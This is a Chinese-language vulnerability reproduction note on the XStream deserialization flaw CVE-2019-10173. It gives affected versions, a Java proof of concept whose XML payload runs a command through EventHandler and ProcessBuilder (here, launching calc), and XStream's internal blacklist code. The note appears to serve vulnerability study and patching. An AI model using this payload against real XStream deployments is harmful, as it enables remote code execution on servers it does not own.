跳转至

(CVE-2019-10173)Xstream 远程代码执行漏洞

一、漏洞简介

Xstream 1.4.10版本存在反序列化漏洞CVE-2013-7285补丁绕过。

二、漏洞影响

XStream \<= 1.4.6

XStream = 1.4.10

三、复现过程

poc

package com.bigo;

import com.thoughtworks.xstream.XStream;

import java.beans.EventHandler;
import java.io.IOException;
import java.util.Set;
import java.util.TreeSet;

/**
 * Created by cfchi on 2019/7/26.
 */
public class Main {
    public static String expGen(){
        XStream xstream = new XStream();
        Set&lt;Comparable&gt; set = new TreeSet&lt;Comparable&gt;();
        set.add("foo");
        set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start"));
        String payload = xstream.toXML(set);
        System.out.println(payload);
        return payload;
    }
    public static void main(String[] args) throws IOException {
        expGen();
        XStream xStream = new XStream();
        String payload = "&lt;sorted-set&gt;\n" +
                "    &lt;string&gt;foo&lt;/string&gt;\n" +
                "    &lt;dynamic-proxy&gt;\n" +
                "    &lt;interface&gt;java.lang.Comparable&lt;/interface&gt;\n" +
                "        &lt;handler class=\"java.beans.EventHandler\"&gt;\n" +
                "            &lt;target class=\"java.lang.ProcessBuilder\"&gt;\n" +
                "                &lt;command&gt;\n" +
                "                    &lt;string&gt;cmd.exe&lt;/string&gt;\n" +
                "                    &lt;string&gt;/c&lt;/string&gt;\n" +
                "                    &lt;string&gt;calc&lt;/string&gt;\n" +
                "                &lt;/command&gt;\n" +
                "            &lt;/target&gt;\n" +
                "     &lt;action&gt;start&lt;/action&gt;"+
                "        &lt;/handler&gt;\n" +
                "    &lt;/dynamic-proxy&gt;\n" +
                "&lt;/sorted-set&gt;\n";
       xStream.fromXML(payload);
    }
}

1.4.7版本白名单

1.4.10版本,黑名单未开启

1.4.11版本,黑名单开启

黑名单

private class InternalBlackList implements Converter {
    private InternalBlackList() {
    }

    public boolean canConvert(Class type) {
        return type == Void.TYPE || type == Void.class || !XStream.this.securityInitialized &amp;&amp; type != null &amp;&amp; (type.getName().equals("java.beans.EventHandler") || type.getName().endsWith("$LazyIterator") || type.getName().startsWith("javax.crypto."));
    }

    public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
        throw new ConversionException("Security alert. Marshalling rejected.");
    }

    public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
        throw new ConversionException("Security alert. Unmarshalling rejected.");
    }
}

参考链接

http://www.polaris-lab.com/index.php/archives/658/